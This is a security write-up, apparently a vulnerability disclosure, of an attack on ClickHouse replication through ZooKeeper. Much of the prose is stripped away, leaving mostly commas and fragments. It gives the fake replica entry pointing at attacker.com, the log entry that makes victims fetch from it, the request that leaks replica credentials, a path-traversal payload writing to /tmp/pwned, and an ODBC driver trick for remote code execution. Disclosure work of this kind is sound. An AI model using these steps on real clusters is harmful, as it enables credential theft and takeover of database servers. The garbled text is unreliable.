本文将讲述ClickHouse复制协议中一个非常常见的漏洞,并且还将展示如何扩展攻击平面。
ClickHouse — , . ClickHouse Apache ZooKeeper (ZK) .
ZK , ZK , Kafka, Hadoop, ClickHouse .
ZooKeeper
0day Java , , ZooKeeper, ClickHouse.
ClickHouse DDL, ZK — /clickhouse/task_queue/ddl
.
/clickhouse/task_queue/ddl/query-0001
:
version: 1
query: DROP TABLE xxx ON CLUSTER test;
hosts: ['host1:9000', 'host2:9000']
host1 host2 test . DDL CREATE/ALTER/DROP.
? ?
ClickHouse , ZK , . (ZK , chXX — , foobar — ):
CREATE TABLE foobar
(
`action_id` UInt32 DEFAULT toUInt32(0),
`status` String
)
ENGINE=ReplicatedMergeTree(
'/clickhouse/tables/01-01/foobar/', 'chXX')
ORDER BY action_id;
columns metadata.
/clickhouse/tables/01/foobar/replicas/chXX/hosts:
host: chXX-address
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http
? , (TCP/9009
) chXX-address
firewall . ?
ZK, /clickhouse/tables/01-01/foobar/replicas/chXX
host
.
/clickhouse/tables/01–01/foobar/replicas/attacker/host:
host: attacker.com
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http
, , — ZK /clickhouse/tables/01-01/foobar/log/log-00000000XX
(XX , , ):
format version: 4
create_time: 2019-07-31 09:37:42
source replica: attacker
block_id: all_7192349136365807998_13893666115934954449
get
all_0_0_2
source_replica — , , block_id — , get — "get block" ( ).
, , ( , HTTP). attacker.com
:
POST /?endpoint=DataPartsExchange:/clickhouse/tables/01-01/default/foobar/replicas/chXX&part=all_0_0_2&compress=false HTTP/1.1
Host: attacker.com
Authorization: XXX
XXX — . ClickHouse HTTP. , , ZooKeeper, , .
, , .
, , , , . , .
/var/lib/clickhouse
( - ):
flags — , ;
tmp — ;
user_files — (INTO OUTFILE );
metadata — sql ;
preprocessed_configs — /etc/clickhouse-server
;
data — , ( /var/lib/clickhouse/data/default
).
action_id.bin
action_id.mrk2
checksums.txt
columns.txt
count.txt
primary.idx
status.bin
status.mrk2
- .
file_name WriteBufferFromFile
. , clickhouse
. , , ( ):
\x01
\x00\x00\x00\x00\x00\x00\x00\x24
../../../../../../../../../tmp/pwned
\x12\x00\x00\x00\x00\x00\x00\x00
hellofromzookeeper
../../../../../../../../../tmp/pwned
/tmp/pwned hellofromzookeeper.
(RCE).
RCE
ClickHouse clickhouse -. XML, , /var/lib/clickhouse/preprocessed_configs
. . /etc/clickhouse-server
, . ClickHouse -, — . ClickHouse, , root
.
ODBC RCE
clickhouse
, /nonexistent
. , , /nonexistent
clickhouse
(! . ).
ClickHouse ODBC . ODBC (.so). ClickHouse , odbc-bridge
, . , , ?
~/.odbc.ini
:
[lalala]
Driver=/var/lib/clickhouse/user_files/test.so
SELECT * FROM odbc('DSN=lalala', 'test', 'test');
test.so
RCE ( buglloc ).
ClickHouse 19.14.3. ClickHouse ZooKeepers!